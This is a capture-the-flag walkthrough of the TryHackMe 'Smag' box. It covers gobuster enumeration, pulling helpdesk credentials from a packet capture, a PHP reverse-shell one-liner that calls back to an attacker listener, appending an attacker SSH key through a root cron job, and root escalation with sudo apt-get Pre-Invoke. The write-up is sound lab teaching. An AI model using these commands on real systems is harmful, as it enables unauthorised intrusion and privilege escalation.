Do you remember how to analyse packets?

This is a easy rated box. Let’s begin.


nmap says we’ve got 22 (SSH) and 80 (HTTP) only.


There’s not much on the home page for the website, so we’ll run a quick gobuster:

root@kali:/opt/tryhackme/smag# gobuster dir -u -w /usr/share/dirb/wordlists/common.txt

This turns up one interesting directory - mail. Checking that we get a message about a packet capture along with a download link. It says you have to download it with wget, although I’m sure that’s not actually necessary. Let’s do it anyway:

root@kali:/opt/tryhackme/smag# wget
--2020-07-31 03:52:52--
Connecting to connected.
HTTP request sent, awaiting response... 200 OK
Length: 1209 (1.2K) [application/vnd.tcpdump.pcap]
Saving to: ‘dHJhY2Uy.pcap’

dHJhY2Uy.pcap                        100%[====================================================================>]   1.18K  --.-KB/s    in 0s      

2020-07-31 03:52:53 (29.8 MB/s) - ‘dHJhY2Uy.pcap’ saved [1209/1209]


We can open the packet capture in Wireshark and it’s very straightforward, we find a POST request with some important details, being a new subdomain:


and some credentials: helpdesk:REDACTED

We add development.smag.thm to our /etc/hosts and continue.


Once we go to development.smag.thm/login.php and authenticate, we get a page that says ‘enter a command’. Any number of commands can be tried but none of them appear to do anything….until you start a listener and try a reverse shell:

php -r '$sock=fsockopen("",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

Thanks, pentestmonkey.

On the box

As usual I run linpeas; this time we find a cron job:

root /bin/cat /opt/.backups/ > /home/jake/.ssh/authorized_keys

So the job is copying jake’s public key to the authorized keys file. Good to know.


Let’s generate a new SSH key with ssh-keygen:

root@kali:/opt/tryhackme/smag# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): ./id_rsa

Once that’s done (with the passphrase of ‘yolo’), we can get it on the box and we can append it to the file and wait for the cron job to run.

--2020-07-31 04:17:32--
Connecting to connected.
HTTP request sent, awaiting response... 200 OK
Length: 563 [application/octet-stream]
Saving to: ''          100%[===================>]     563  --.-KB/s    in 0s      

2020-07-31 04:17:33 (106 MB/s) - '' saved [563/563]
www-data@smag:/dev/shm$ /bin/cat >> /opt/.backups/


Now we can login as jake with our passphrase:

root@kali:/opt/tryhackme/smag# ssh -i id_rsa jake@smag.thm

Running sudo -l gives us this:

jake@smag:~$ sudo -l
Matching Defaults entries for jake on smag:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User jake may run the following commands on smag:
    (ALL : ALL) NOPASSWD: /usr/bin/apt-get

And GTFOBins does the rest:

jake@smag:~$ sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh
# whoami